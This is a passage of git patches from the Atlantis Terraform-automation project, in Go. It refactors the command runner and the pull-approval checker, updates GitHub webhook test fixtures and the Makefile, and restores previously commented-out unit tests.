+		CommandRunner:                commandRunner,
 		PullCleaner:                  pullClosedExecutor,
 		Parser:                       eventParser,
 		CommentParser:                commentParser,
@@ -285,14 +283,12 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		RepoWhitelistChecker:         repoWhitelist,
 		SupportedVCSHosts:            supportedVCSHosts,
 		VCSClient:                    vcsClient,
-		AtlantisGithubUser:           models.User{Username: userConfig.GithubUser},
-		AtlantisGitlabUser:           models.User{Username: userConfig.GitlabUser},
 	}
 	return &Server{
 		AtlantisVersion:    config.AtlantisVersion,
 		Router:             underlyingRouter,
 		Port:               userConfig.Port,
-		CommandHandler:     commandHandler,
+		CommandRunner:      commandRunner,
 		Logger:             logger,
 		Locker:             lockingClient,
 		AtlantisURL:        userConfig.AtlantisURL,
@@ -313,7 +309,8 @@ func (s *Server) Start() error {
 	s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo}))
 	s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST")
 	s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}")
-	s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries(LockViewRouteIDQueryParam, "{id}").Name(LockViewRouteName)
+	s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").
+		Queries(LockViewRouteIDQueryParam, fmt.Sprintf("{%s}", LockViewRouteIDQueryParam)).Name(LockViewRouteName)
 	n := negroni.New(&negroni.Recovery{
 		Logger:     log.New(os.Stdout, "", log.LstdFlags),
 		PrintStack: false,
diff --git a/server/server_test.go b/server/server_test.go
index 54776cfe9e..cec7a4fcb9 100644
--- a/server/server_test.go
+++ b/server/server_test.go
@@ -103,6 +103,7 @@ func TestIndex_Success(t *testing.T) {
 }
 
 func responseContains(t *testing.T, r *httptest.ResponseRecorder, status int, bodySubstr string) {
+	t.Helper()
 	Equals(t, status, r.Result().StatusCode)
 	body, _ := ioutil.ReadAll(r.Result().Body)
 	Assert(t, strings.Contains(string(body), bodySubstr), "exp %q to be contained in %q", bodySubstr, string(body))
diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json
index 1fd568761e..cc281a8d7a 100644
--- a/server/testfixtures/githubPullRequestClosedEvent.json
+++ b/server/testfixtures/githubPullRequestClosedEvent.json
@@ -1,15 +1,15 @@
 {
   "action": "closed",
-  "number": 1,
+  "number": 2,
   "pull_request": {
-    "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1",
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2",
     "id": 193308707,
     "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3",
-    "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
-    "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff",
-    "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch",
-    "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
-    "number": 1,
+    "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2",
+    "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff",
+    "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch",
+    "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2",
+    "number": 2,
     "state": "closed",
     "locked": false,
     "title": "Add new project layouts",
@@ -53,10 +53,10 @@
 
     ],
     "milestone": null,
-    "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits",
-    "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments",
+    "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits",
+    "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments",
     "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}",
-    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments",
+    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments",
     "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e",
     "head": {
       "label": "runatlantis:atlantisyaml",
@@ -308,25 +308,25 @@
     },
     "_links": {
       "self": {
-        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1"
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2"
       },
       "html": {
-        "href": "https://github.com/runatlantis/atlantis-tests/pull/1"
+        "href": "https://github.com/runatlantis/atlantis-tests/pull/2"
       },
       "issue": {
-        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1"
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2"
       },
       "comments": {
-        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments"
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments"
       },
       "review_comments": {
-        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments"
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments"
       },
       "review_comment": {
         "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}"
       },
       "commits": {
-        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits"
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits"
       },
       "statuses": {
         "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e"
diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json
index 0b969438ec..03ee106b5e 100644
--- a/server/testfixtures/githubPullRequestOpenedEvent.json
+++ b/server/testfixtures/githubPullRequestOpenedEvent.json
@@ -12,7 +12,7 @@
     "number": 2,
     "state": "open",
     "locked": false,
-    "title": "Noyaml",
+    "title": "branch",
     "user": {
       "login": "runatlantis",
       "id": 1034429,
@@ -59,8 +59,8 @@
     "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments",
     "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
     "head": {
-      "label": "runatlantis:noyaml",
-      "ref": "noyaml",
+      "label": "runatlantis:branch",
+      "ref": "branch",
       "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
       "user": {
         "login": "runatlantis",
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act
deleted file mode 100644
index aa4f734726..0000000000
--- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act
+++ /dev/null
@@ -1,7 +0,0 @@
-Ran Apply in dir: `.` workspace: `default`
-**Apply Error**
-```
-no plan found at path "." and workspace "default"–did you run plan?
-```
-
-
diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act
deleted file mode 100644
index 0da9bc5a5e..0000000000
--- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act
+++ /dev/null
@@ -1,61 +0,0 @@
-Ran Plan for 2 projects:
-1. workspace: `default` path: `.`
-1. workspace: `default` path: `.`
-
-### 1. workspace: `default` path: `.`
-**Plan Error**
-```
-exit status 1: running "sh -c terraform init -no-color -backend-config=default.backend.tfvars" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/201347935/repos/runatlantis/atlantis-tests/1/default": 
-
-Initializing the backend...
-
-Successfully configured the backend "local"! Terraform will automatically
-use this backend unless the backend configuration changes.
-
-Initializing provider plugins...
-- Checking for available provider plugins on https://releases.hashicorp.com...
-
-Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: net/http: TLS handshake timeout.
-
-Terraform analyses the configuration and state and automatically downloads
-plugins for the providers used. However, when attempting to download this
-plugin an unexpected error occured.
-
-This may be caused if for some reason Terraform is unable to reach the
-plugin repository. The repository may be unreachable if access is blocked
-by a firewall.
-
-If automatic installation is not possible or desirable in your environment,
-you may alternatively manually install plugins by downloading a suitable
-distribution package and placing the plugin's executable file in the
-following directory:
-    terraform.d/plugins/darwin_amd64
-
-
-```
-
----
-### 2. workspace: `default` path: `.`
-```diff
-Refreshing Terraform state in-memory prior to plan...
-The refreshed state will be used to calculate this plan, but will not be
-persisted to local or remote state storage.
-
-
-------------------------------------------------------------------------
-
-An execution plan has been generated and is shown below.
-Resource actions are indicated with the following symbols:
-  + create
-
-Terraform will perform the following actions:
-
-+ null_resource.simple
-      id: <computed>
-Plan: 1 to add, 0 to change, 0 to destroy.
-
-```
-
-* To **discard** this plan click [here](lock-url).
----
-

From 124a016f089451023402c0be0a03e4ef8ee77da1 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 21 Jun 2018 18:27:03 +0100
Subject: [PATCH 41/69] WIP

---
 server/events/project_command_runner.go       |  2 +-
 .../events/runtime/apply_step_runner_test.go  | 27 +++++++++++++++++++
 .../events/runtime/pull_approved_checker.go   | 13 ++-------
 server/events_controller_e2e_test.go          |  6 ++---
 server/server.go                              |  6 ++---
 5 files changed, 34 insertions(+), 20 deletions(-)

diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index 0db221defe..45117c3a06 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -153,7 +153,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo
 		for _, req := range ctx.ProjectConfig.ApplyRequirements {
 			switch req {
 			case "approved":
-				approved, err := p.PullApprovedChecker.IsApproved(ctx.BaseRepo, ctx.Pull)
+				approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull)
 				if err != nil {
 					return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
 				}
diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go
index afc5c99e30..4ebdc39c05 100644
--- a/server/events/runtime/apply_step_runner_test.go
+++ b/server/events/runtime/apply_step_runner_test.go
@@ -65,6 +65,33 @@ func TestRun_Success(t *testing.T) {
 	terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace")
 }
 
+func TestRun_AppliesCorrectProjectPlan(t *testing.T) {
+	// When running for a project, the planfile has a different name.
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+	planPath := filepath.Join(tmpDir, "projectname-default.tfplan")
+	err := ioutil.WriteFile(planPath, nil, 0644)
+	Ok(t, err)
+
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+	o := runtime.ApplyStepRunner{
+		TerraformExecutor: terraform,
+	}
+
+	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+		ThenReturn("output", nil)
+	output, err := o.Run(models.ProjectCommandContext{
+		Workspace:   "default",
+		RepoRelPath: ".",
+		ProjectName: "projectname",
+		CommentArgs: []string{"comment", "args"},
+	}, []string{"extra", "args"}, tmpDir)
+	Ok(t, err)
+	Equals(t, "output", output)
+	terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "default")
+}
+
 func TestRun_UsesConfiguredTFVersion(t *testing.T) {
 	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
diff --git a/server/events/runtime/pull_approved_checker.go b/server/events/runtime/pull_approved_checker.go
index 049f434969..86945fce33 100644
--- a/server/events/runtime/pull_approved_checker.go
+++ b/server/events/runtime/pull_approved_checker.go
@@ -2,17 +2,8 @@ package runtime
 
 import (
 	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/vcs"
 )
 
-type PullApprovedChecker struct {
-	VCSClient vcs.ClientProxy
-}
-
-func (a *PullApprovedChecker) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
-	approved, err := a.VCSClient.PullIsApproved(baseRepo, pull)
-	if err != nil {
-		return false, err
-	}
-	return approved, nil
+type PullApprovedChecker interface {
+	PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error)
 }
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 5abb66ad37..85870df845 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -252,10 +252,8 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 			ApplyStepRunner: runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner: runtime.RunStepRunner{},
-			PullApprovedChecker: runtime.PullApprovedChecker{
-				VCSClient: e2eVCSClient,
-			},
+			RunStepRunner:           runtime.RunStepRunner{},
+			PullApprovedChecker:     e2eVCSClient,
 			Workspace:               atlantisWorkspace,
 			Webhooks:                &mockWebhookSender{},
 			AtlantisWorkspaceLocker: locker,
diff --git a/server/server.go b/server/server.go
index 1980ba2521..d02c1c9221 100644
--- a/server/server.go
+++ b/server/server.go
@@ -251,10 +251,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 			ApplyStepRunner: runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner: runtime.RunStepRunner{},
-			PullApprovedChecker: runtime.PullApprovedChecker{
-				VCSClient: vcsClient,
-			},
+			RunStepRunner:           runtime.RunStepRunner{},
+			PullApprovedChecker:     vcsClient,
 			Workspace:               workspace,
 			Webhooks:                webhooksManager,
 			AtlantisWorkspaceLocker: workspaceLocker,

From 17a9c7f535d91dc49193ede612beaa2e8cf6a9f4 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 21 Jun 2018 18:50:19 +0100
Subject: [PATCH 42/69] Regen mocks

---
 Makefile                                      |  11 +-
 server/events/command_runner_test.go          | 359 +++++++++---------
 server/events/executor.go                     |  22 --
 .../matchers/events_commandparseresult.go     |  20 -
 ...nd.go => ptr_to_events_trylockresponse.go} |  10 +-
 .../mocks/mock_atlantis_workspace_locker.go   |  51 +++
 server/events/mocks/mock_executor.go          |  76 ----
 server/events/mocks/mock_project_lock.go      |  98 +++++
 server/events/vcs/mocks/mock_client.go        |  20 +-
 server/logging/simple_logger.go               |   2 +
 10 files changed, 355 insertions(+), 314 deletions(-)
 delete mode 100644 server/events/executor.go
 delete mode 100644 server/events/mocks/matchers/events_commandparseresult.go
 rename server/events/mocks/matchers/{ptr_to_events_command.go => ptr_to_events_trylockresponse.go} (51%)
 delete mode 100644 server/events/mocks/mock_executor.go
 create mode 100644 server/events/mocks/mock_project_lock.go

diff --git a/Makefile b/Makefile
index 5f10ddf0eb..c2510ac725 100644
--- a/Makefile
+++ b/Makefile
@@ -28,11 +28,12 @@ build-service: ## Build the main Go service
 go-generate: ## Run go generate in all packages
 	go generate $(PKG)
 
-regen-mocks: ## Delete all mocks and then run go generate to regen them
-	find . -type f | grep mocks/mock | grep -v vendor | xargs rm
-	@# not using $(PKG) here because that it includes directories that have now
-	@# been deleted, causing go generate to fail.
-	go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)
+#regen-mocks: ## Delete all mocks and matchers and then run go generate to regen them. This doesn't work anymore.
+#find . -type f | grep mocks/mock_ | grep -v vendor | xargs rm
+#find . -type f | grep mocks/matchers | grep -v vendor | xargs rm
+#@# not using $(PKG) here because that it includes directories that have now
+#@# been deleted, causing go generate to fail.
+#echo "this doesn't work anymore: go generate \$\$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)"
 
 test: ## Run tests
 	@go test -short $(PKG)
diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
index a0d636c9a8..456ce6d293 100644
--- a/server/events/command_runner_test.go
+++ b/server/events/command_runner_test.go
@@ -15,15 +15,22 @@ package events_test
 
 import (
 	"bytes"
+	"errors"
 	"log"
+	"strings"
 	"testing"
 
+	"github.com/google/go-github/github"
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events"
 	"github.com/runatlantis/atlantis/server/events/mocks"
+	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/models/fixtures"
+	"github.com/runatlantis/atlantis/server/events/vcs"
 	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
 	logmocks "github.com/runatlantis/atlantis/server/logging/mocks"
-	//. "github.com/runatlantis/atlantis/testing"
+	. "github.com/runatlantis/atlantis/testing"
 )
 
 var projectCommandBuilder *mocks.MockProjectCommandBuilder
@@ -62,178 +69,178 @@ func setup(t *testing.T) {
 	}
 }
 
-//func TestExecuteCommand_LogPanics(t *testing.T) {
-//	t.Log("if there is a panic it is commented back on the pull request")
-//	setup(t)
-//	ch.AllowForkPRs = true // Lets us get to the panic code.
-//	defer func() { ch.AllowForkPRs = false }()
-//	When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic")
-//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
-//	_, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
-//	Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
-//}
-//
-//func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
-//	t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged")
-//	setup(t)
-//	ch.GithubPullGetter = nil
-//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
-//	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
-//}
-//
-//func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
-//	t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged")
-//	setup(t)
-//	ch.GitlabMergeRequestGetter = nil
-//	ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil)
-//	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
-//}
-//
-//func TestExecuteCommand_GithubPullErr(t *testing.T) {
-//	t.Log("if getting the github pull request fails an error should be logged")
-//	setup(t)
-//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
-//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
-//	Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
-//}
-//
-//func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
-//	t.Log("if getting the gitlab merge request fails an error should be logged")
-//	setup(t)
-//	When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
-//	ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
-//	Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
-//}
-//
-//func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
-//	t.Log("if parsing the returned github pull request fails an error should be logged")
-//	setup(t)
-//	var pull github.PullRequest
-//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err"))
-//
-//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
-//	Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
-//}
-//
-//func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
-//	t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
-//		" comment saying that this is not allowed")
-//	setup(t)
-//	ch.AllowForkPRs = false // by default it's false so don't need to reset
-//	var pull github.PullRequest
-//	modelPull := models.PullRequest{State: models.Open}
-//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-//
-//	headRepo := fixtures.GithubRepo
-//	headRepo.FullName = "forkrepo/atlantis"
-//	headRepo.Owner = "forkrepo"
-//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil)
-//
-//	ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil)
-//	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
-//}
-//
-//func TestExecuteCommand_ClosedPull(t *testing.T) {
-//	t.Log("if a command is run on a closed pull request atlantis should" +
-//		" comment saying that this is not allowed")
-//	setup(t)
-//	pull := &github.PullRequest{
-//		State: github.String("closed"),
-//	}
-//	modelPull := models.PullRequest{State: models.Closed}
-//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-//	When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil)
-//
-//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
-//	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
-//}
-//
-//func TestExecuteCommand_WorkspaceLocked(t *testing.T) {
-//	t.Log("if the workspace is locked, should comment back on the pull")
-//	setup(t)
-//	pull := &github.PullRequest{
-//		State: github.String("closed"),
-//	}
-//	cmd := events.CommentCommand{
-//		Name:      events.Plan,
-//		Workspace: "workspace",
-//	}
-//
-//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-//	When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false)
-//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-//
-//	msg := "The workspace workspace is currently locked by another" +
-//		" command that is running for this pull request." +
-//		" Wait until the previous command is complete and try again."
-//	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName())
-//	_, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-//	Equals(t, msg, result.Failure)
-//	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num,
-//		"**Plan Failed**: "+msg+"\n\n")
-//}
-//
-//func TestExecuteCommand_FullRun(t *testing.T) {
-//	t.Log("when running a plan, apply should comment")
-//	pull := &github.PullRequest{
-//		State: github.String("closed"),
-//	}
-//	cmdResult := events.CommandResult{}
-//	for _, c := range []events.CommandName{events.Plan, events.Apply} {
-//		setup(t)
-//		cmd := events.CommentCommand{
-//			Name:      c,
-//			Workspace: "workspace",
-//		}
-//		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-//		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-//		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
-//		switch c {
-//		case events.Plan:
-//			When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
-//		case events.Apply:
-//			When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
-//		}
-//
-//		ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-//
-//		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-//		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-//		Equals(t, cmdResult, response)
-//		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-//		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-//	}
-//}
-//
-//func TestExecuteCommand_ForkPREnabled(t *testing.T) {
-//	t.Log("when running a plan on a fork PR, it should succeed")
-//	setup(t)
-//
-//	// Enable forked PRs.
-//	ch.AllowForkPRs = true
-//	defer func() { ch.AllowForkPRs = false }() // Reset after test.
-//
-//	var pull github.PullRequest
-//	cmdResponse := events.CommandResult{}
-//	cmd := events.CommentCommand{
-//		Name:      events.Plan,
-//		Workspace: "workspace",
-//	}
-//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-//	headRepo := fixtures.GithubRepo
-//	headRepo.FullName = "forkrepo/atlantis"
-//	headRepo.Owner = "forkrepo"
-//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
-//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
-//	When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-//
-//	ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
-//
-//	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-//	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-//	Equals(t, cmdResponse, response)
-//	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-//	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-//}
+func TestExecuteCommand_LogPanics(t *testing.T) {
+	t.Log("if there is a panic it is commented back on the pull request")
+	setup(t)
+	ch.AllowForkPRs = true // Lets us get to the panic code.
+	defer func() { ch.AllowForkPRs = false }()
+	When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic")
+	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+	_, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+	Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
+}
+
+func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
+	t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged")
+	setup(t)
+	ch.GithubPullGetter = nil
+	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
+}
+
+func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
+	t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged")
+	setup(t)
+	ch.GitlabMergeRequestGetter = nil
+	ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil)
+	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
+}
+
+func TestExecuteCommand_GithubPullErr(t *testing.T) {
+	t.Log("if getting the github pull request fails an error should be logged")
+	setup(t)
+	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+	Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
+}
+
+func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
+	t.Log("if getting the gitlab merge request fails an error should be logged")
+	setup(t)
+	When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+	ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
+	Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
+}
+
